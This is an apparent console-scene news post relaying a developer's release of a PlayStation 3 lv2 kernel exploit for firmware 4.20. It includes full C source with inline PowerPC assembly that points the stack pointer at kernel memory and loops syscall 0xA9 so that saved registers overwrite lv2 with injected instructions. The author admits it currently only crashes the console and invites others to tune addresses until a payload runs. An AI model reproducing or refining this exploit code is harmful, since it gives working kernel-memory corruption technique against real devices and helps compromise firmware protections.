Coder KDSBest has released a new lv2 exploit that appears to work on 4.20.
At the moment this exploit only crashes the console, but it is an excellent starting point for building a new Custom Firmware on firmware above 3.55.

Since @naehrwert posted an lv2 exploit I will do so too. The stack pointer points to lv2 and if we do a syscall, the syscall saves registers to the stack HAHA. Btw. it just crashes the console for now, since I totally overwrite dump the lv2 or some memory addresses I don't know. Feel free to try around, adjust the address of the stack pointer and so on. If you manage to get the panic payload executed, tell me!!! ^^

//compile: ppu-gcc kds2.c -o kds2.elf
//or: ppu-lv2-gcc kds2.c -o kds2.elf

// Global register variables: each is pinned to a fixed PPU GPR so the
// inline asm below can rely on where the values live.
register unsigned long long payloadHolder2 asm ("r21");
register unsigned long long payloadHolder asm ("r20");
register unsigned long long stackpointer asm ("r1");      // r1 is the PowerPC stack pointer
register unsigned long long counter asm ("r25");
register unsigned long long bufferStackpointer asm ("r26");

int __volatile__ main(int argc, const char* argv[])
{
    // backup Stack pointer
    bufferStackpointer = stackpointer;

    payloadHolder = 0x3960024F3960024FUL;   // two "li r11, 0x24F" instructions
    payloadHolder2 = 0x4400000244000002UL;  // two "sc" instructions

    // Incrementer
    counter = 0x00;

    // Play with that address till the panic is executed, I lack the time to do so
    // add always 2 or 4 to it, i would try 4 or 8... bla bla you will get the idea
    stackpointer = 0x8000000000000100UL;
doItAgain:
    // KDSBest Payload
    // Prepare for our Syscall

    asm("li %r0, 0x0");
    asm("li %r3, 0x6");
    asm("li %r4, 0x1");
    // li r11, 0x24F -> PANIC
    // fill the non-volatile registers with the payload so the syscall's
    // register save writes it onto the (redirected) stack
    asm("mr %r22, %r20");
    asm("mr %r23, %r20");
    asm("mr %r24, %r20");
    asm("mr %r27, %r20");
    asm("mr %r28, %r20");
    asm("mr %r29, %r20");
    asm("mr %r30, %r20");
    asm("mr %r31, %r20");

    // Stack Pointer = Build Address of LV2
    stackpointer += counter;

    // Syscall 0xA9
    asm("li %r11, 0xA9");
    asm("sc");
    counter += 0x04;

    // We write sc
    asm("mr %r22, %r21");
    asm("mr %r23, %r21");
    asm("mr %r24, %r21");
    asm("mr %r27, %r21");
    asm("mr %r28, %r21");
    asm("mr %r29, %r21");
    asm("mr %r30, %r21");
    asm("mr %r31, %r21");

    // Stack Pointer = Build Address of LV2
    stackpointer += counter;

    // Syscall 0xA9
    asm("li %r11, 0xA9");
    asm("sc");
    counter += 0x04;

    if(counter < 0x1000000)
        goto doItAgain;

    // restore the original stack pointer before returning
    stackpointer = bufferStackpointer;
    return 0;
}

I didn't manage to make it work on 4.21, so I just did it on 4.20.